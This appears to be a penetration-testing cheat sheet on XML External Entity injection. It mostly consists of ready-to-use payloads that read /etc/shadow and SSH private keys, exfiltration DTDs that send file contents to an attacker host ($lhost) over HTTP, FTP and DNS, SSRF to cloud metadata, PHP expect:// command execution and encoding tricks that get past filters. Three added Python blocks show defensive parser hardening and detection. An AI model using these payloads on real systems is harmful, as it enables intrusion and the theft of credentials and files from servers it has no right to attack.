# XML External Entity (XXE) Injection


## Basic XXE

### Quick Check (One-liner)

```bash
# Test XXE with basic payload
echo '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' | curl -X POST -d @- http://$rhost/api -H "Content-Type: application/xml"
```

### Classic XXE Payload

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>
```

### Parameter Entity

The parameter entity pulls an external DTD from your host; that DTD has to declare the `send` general entity that the document body references.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://$lhost/evil.dtd">
  %xxe;
]>
<root>
  <data>&send;</data>
</root>
```
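The fix for everything in this section is parser configuration, not input filtering. As an added example that is not part of this cheat sheet, the following Python hardens the standard library's expat bindings (`xml.parsers.expat`) so the parser refuses the DOCTYPE, entity declarations and external entity references the payloads above depend on, and also rejects XInclude elements. The sample documents are constructed from the payload shapes on this page; nothing is ever fetched, so no `$lhost` is needed.

```python
import xml.parsers.expat as expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


class UnsafeXML(ValueError):
    """The document used a construct this parser refuses (DTD, entity, XInclude)."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Fires on '<!DOCTYPE', before any entity in the internal subset is read.
    raise UnsafeXML(f"DOCTYPE '{name}' rejected (external DTD: {system_id!r})")


def _reject_entity_decl(name, is_param, value, base, system_id, public_id, notation):
    kind = "parameter" if is_param else "general"
    raise UnsafeXML(f"{kind} entity '{name}' rejected (SYSTEM {system_id!r})")


def _reject_external_ref(context, base, system_id, public_id):
    raise UnsafeXML(f"external entity reference to {system_id!r} rejected")


def parse_untrusted(data: bytes) -> list:
    """Parse `data` into a flat list of (local element name, text) pairs.

    Raises UnsafeXML for any DOCTYPE, entity declaration, external entity
    reference or XInclude element, and expat.ExpatError for malformed input
    (which includes encodings expat does not know, such as UTF-7).
    """
    parser = expat.ParserCreate(namespace_separator=" ")
    # expat never loads an external DTD when parameter-entity parsing is off,
    # and never loads an external general entity unless a handler asks for it;
    # the handlers below additionally refuse the declarations outright, so a
    # document that even tries is reported rather than silently emptied.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.EntityDeclHandler = _reject_entity_decl
    parser.ExternalEntityRefHandler = _reject_external_ref

    result = []
    stack = []

    def start(name, attrs):
        # With namespace processing on, names arrive as "<uri> <local>".
        namespace, _, local = name.rpartition(" ")
        if namespace == XINCLUDE_NS:
            raise UnsafeXML(f"XInclude element <{local}> rejected")
        stack.append((local, []))

    def chars(text):
        # expat may deliver one text node in several pieces; collect them.
        if stack:
            stack[-1][1].append(text)

    def end(name):
        local, parts = stack.pop()
        result.append((local, "".join(parts)))

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return result


def check(data: bytes) -> str:
    """'ok' when the document parses cleanly, otherwise a one-line reason."""
    try:
        parse_untrusted(data)
        return "ok"
    except UnsafeXML as exc:
        return f"rejected: {exc}"
    except expat.ExpatError as exc:
        return f"malformed: {exc}"


# Constructed samples, taken from the payload shapes on this page.
CLASSIC = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
           b'"file:///etc/passwd">]><foo>&xxe;</foo>')
UTF16 = CLASSIC.decode("ascii").encode("utf-16")  # BOM + UTF-16, as iconv -t UTF-16 emits
XINCLUDE = (b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            b'<xi:include parse="text" href="file:///etc/passwd"/></foo>')
BENIGN = b'<root><data>hello</data></root>'

if __name__ == "__main__":
    for label, doc in [("classic", CLASSIC), ("utf-16", UTF16),
                       ("xinclude", XINCLUDE), ("benign", BENIGN)]:
        print(f"{label:9s} {check(doc)}")
```

Because expat decodes the BOM itself, the UTF-16 variant from the Filter Bypass section is rejected exactly like the plain one; a UTF-7 document fails with an "unknown encoding" ExpatError, which is also a rejection. Note that expat does not process XInclude, so the element check matters only if a later stage would; it is kept here so the parser reports the attempt.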

## File Disclosure

### Linux Files

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
```

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/shadow">
]>
<foo>&xxe;</foo>
```

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa">
]>
<foo>&xxe;</foo>
```

### Windows Files

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<foo>&xxe;</foo>
```

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<foo>&xxe;</foo>
```

### PHP Wrapper (Base64 Encoded Source)

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<foo>&xxe;</foo>
```

## Blind XXE

### Out-of-Band Detection

#### External DTD File (evil.dtd on attacker server)

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://$lhost/?data=%file;'>">
%eval;
%exfiltrate;
```

#### Payload

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://$lhost/evil.dtd">
  %xxe;
]>
<foo>test</foo>
```

### Base64 Exfiltration

#### External DTD (evil.dtd)

```xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://$lhost/?data=%file;'>">
%eval;
%exfiltrate;
```

### DNS Exfiltration

```xml
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://xxe.$lhost/">
  %xxe;
]>
```

### FTP Exfiltration

#### External DTD

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'ftp://$lhost:21/%file;'>">
%eval;
%exfiltrate;
```

#### Start FTP Server

```bash
python3 -m pyftpdlib -p 21 -w
```

## Error-Based XXE

### External DTD (error.dtd)

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

### Error-Based XXE Payload

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://$lhost/error.dtd">
  %xxe;
]>
<foo>test</foo>
```

The parser's error message will contain the file contents: the entity under `/nonexistent/` cannot be resolved, and the failing path, with `%file;` already expanded into it, is echoed back in the error.

## XXE to SSRF

### Internal Service Probing

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://127.0.0.1:22/">
]>
<foo>&xxe;</foo>
```

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/">
]>
<foo>&xxe;</foo>
```

### Cloud Metadata

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<foo>&xxe;</foo>
```

### Internal Network Scanning

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.1/">
]>
<foo>&xxe;</foo>
```

## XXE to RCE

### Expect Wrapper (PHP)

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>
```

### PHP Input Wrapper

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://input">
]>
<foo>&xxe;</foo>
```

POST body: `<?php system('id'); ?>`

### Jar Protocol (Java)

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "jar:http://$lhost/evil.jar!/payload.class">
]>
<foo>&xxe;</foo>
```

## Filter Bypass

### UTF-7 Encoding

```xml
<?xml version="1.0" encoding="UTF-7"?>
+ADw-!DOCTYPE foo +AFs-
  +ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-
+AF0-+AD4-
+ADw-foo+AD4-+ACY-xxe+ADsAPA-/foo+AD4-
```

### UTF-16 Encoding

```bash
iconv -f UTF-8 -t UTF-16 payload.xml > payload16.xml
```

### HTML Entities in DTD

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:&#x2f;&#x2f;&#x2f;etc&#x2f;passwd">
]>
<foo>&xxe;</foo>
```

### Without Spaces

```text
<!DOCTYPE%20foo%20[<!ENTITY%20xxe%20SYSTEM%20"file:///etc/passwd">]><foo>&xxe;</foo>
```

### CDATA Section

Wraps the file in a CDATA section so that characters such as `<` or `&` in it do not break the document. The wrapping declaration has to come from an external DTD: parsers reject parameter-entity references inside markup declarations in the internal subset, so declaring `fileContent` inline never works.

```xml
<!DOCTYPE foo [
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "http://$lhost/wrapper.dtd">
  %dtd;
]>
<foo>&fileContent;</foo>
```

wrapper.dtd:

```xml
<!ENTITY fileContent "%start;%file;%end;">
```

## XInclude Attack

When you cannot inject a DOCTYPE (your input is only a fragment of a server-built document), XInclude can still pull in a file:

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>
```
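String filters in front of the parser are exactly what the Filter Bypass section defeats; the control that holds is the parser configuration. Where a filter or detection rule still has to exist (a WAF signature, a request-log scan), it must first decode the body the way the parser will. This added example, which is not part of the cheat sheet, does that in Python for the transport tricks shown above plus XInclude: it picks the charset from a BOM, a BOM-less UTF-16 lead byte or the XML declaration, percent-decodes form posts, and only then looks for the constructs that matter. The sample bodies are constructed from this page's payloads; the UTF-7 body is the one shown above.

```python
import re
import urllib.parse

# Match the constructs an XXE needs, not paths: the entity-encoded variant
# above spells /etc/passwd as &#x2f;, and the target path is the sender's choice.
INDICATORS = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.IGNORECASE),
    "entity-declaration": re.compile(r"<!ENTITY\b", re.IGNORECASE),
    "xinclude": re.compile(r"http://www\.w3\.org/2001/XInclude"),
}
_DECL_ENCODING = re.compile(r'<\?xml[^>]*encoding=["\']([A-Za-z0-9._-]+)["\']')


def detect_encoding(body: bytes) -> str:
    """Pick the charset a conforming XML parser would apply to this body."""
    if body[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return "utf-16"            # BOM present; the codec reads the byte order
    if body[:3] == b"\xef\xbb\xbf":
        return "utf-8-sig"
    if body[:2] == b"<\x00":
        return "utf-16-le"         # BOM-less UTF-16: '<' followed by NUL
    if body[:2] == b"\x00<":
        return "utf-16-be"
    declaration = _DECL_ENCODING.search(body[:200].decode("latin-1"))
    return declaration.group(1).lower() if declaration else "utf-8"


def normalize(body: bytes, content_type: str = "application/xml") -> str:
    """Undo transport encoding, then decode as the parser would."""
    if content_type.startswith("application/x-www-form-urlencoded"):
        body = urllib.parse.unquote_to_bytes(body.replace(b"+", b" "))
    try:
        return body.decode(detect_encoding(body), errors="replace")
    except LookupError:            # charset name Python does not know
        return body.decode("latin-1")


def scan(body: bytes, content_type: str = "application/xml") -> list:
    """Sorted names of the indicators present once the body is decoded."""
    text = normalize(body, content_type)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


# Constructed sample bodies built from the payloads on this page.
CLASSIC = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
           b'"file:///etc/passwd">]><foo>&xxe;</foo>')
UTF16 = CLASSIC.decode("ascii").encode("utf-16")
UTF7 = (b'<?xml version="1.0" encoding="UTF-7"?>\n'
        b'+ADw-!DOCTYPE foo +AFs-\n'
        b'  +ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-\n'
        b'+AF0-+AD4-\n'
        b'+ADw-foo+AD4-+ACY-xxe+ADsAPA-/foo+AD4-')
FORM = b"xml=" + urllib.parse.quote(CLASSIC, safe="").encode("ascii")
XINCLUDE = (b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            b'<xi:include parse="text" href="file:///etc/passwd"/></foo>')
BENIGN = b'<root><data>hello</data></root>'

if __name__ == "__main__":
    print("classic ", scan(CLASSIC))
    print("utf-16  ", scan(UTF16))
    print("utf-7   ", scan(UTF7))
    print("form raw", scan(FORM), "form decoded", scan(FORM, "application/x-www-form-urlencoded"))
    print("xinclude", scan(XINCLUDE))
    print("benign  ", scan(BENIGN))
```

The percent-encoded form body scores nothing when scanned raw and both indicators once decoded, which is the whole point of the "Without Spaces" variant; the UTF-7 and UTF-16 bodies likewise match only after the charset step.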

## XXE via File Upload

### SVG

```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="100" height="100">
  <text x="10" y="20">&xxe;</text>
</svg>
```

### DOCX/XLSX/PPTX

1. Unzip the file
2. Modify `[Content_Types].xml` or other XML files
3. Inject XXE payload
4. Rezip
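The upload paths above hide the XML inside a container, so a check that only looks at the HTTP body misses it. As an added example that is not part of the cheat sheet, this Python walks every XML-like member of an OOXML archive and reports any that carries a DOCTYPE, which OOXML parts do not use; the archive is constructed in memory from a minimal `[Content_Types].xml` and `word/document.xml`, and the size cap is an assumed value. The same byte check applies unchanged to a standalone SVG upload.

```python
import io
import re
import zipfile

DOCTYPE_RX = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
XML_LIKE = re.compile(r"\.(xml|rels|svg)$", re.IGNORECASE)
MAX_PART = 5 * 1024 * 1024   # assumed cap: a larger part is reported, not scanned


def find_doctype_parts(archive: bytes) -> list:
    """Names of every XML-like member of the zip that carries a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not XML_LIKE.search(info.filename):
                continue
            # Read with a limit rather than trusting the size in the header.
            with zf.open(info) as fh:
                data = fh.read(MAX_PART + 1)
            if len(data) > MAX_PART:
                flagged.append(f"{info.filename} (oversized, not scanned)")
                continue
            # A part stored as UTF-16 would hide the ASCII pattern; normalise it.
            if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
                data = data.decode("utf-16", errors="replace").encode("utf-8")
            if DOCTYPE_RX.search(data):
                flagged.append(info.filename)
    return flagged


def build_sample(inject: bool) -> bytes:
    """Constructed minimal OOXML-style archive. With inject=True the
    [Content_Types].xml part carries the DOCTYPE from this page's payloads."""
    types_xml = b'<?xml version="1.0" encoding="UTF-8"?>\n'
    if inject:
        types_xml += b'<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
    types_xml += (b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                  b'<Default Extension="xml" ContentType="application/xml"/></Types>')
    document_xml = b'<?xml version="1.0"?><document><body>hello</body></document>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", types_xml)
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n not really an image")
    return buf.getvalue()


if __name__ == "__main__":
    print("clean   :", find_doctype_parts(build_sample(False)))
    print("injected:", find_doctype_parts(build_sample(True)))
```

Flagging on DOCTYPE alone is deliberate: the payload may sit in any part, not only `[Content_Types].xml`, and an entity declaration cannot exist without one.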

## Payload Cheat Sheet

| Payload | Description |
|---|---|
| `<!ENTITY xxe SYSTEM "file:///etc/passwd">` | Read local file |
| `<!ENTITY xxe SYSTEM "http://$lhost/">` | SSRF/OOB |
| `<!ENTITY xxe SYSTEM "php://filter/...">` | PHP wrapper |
| `<!ENTITY xxe SYSTEM "expect://id">` | RCE via expect |
| `<!ENTITY % xxe SYSTEM "http://$lhost/evil.dtd">` | External DTD |
| `<!ENTITY xxe SYSTEM "http://169.254.169.254/">` | Cloud metadata |
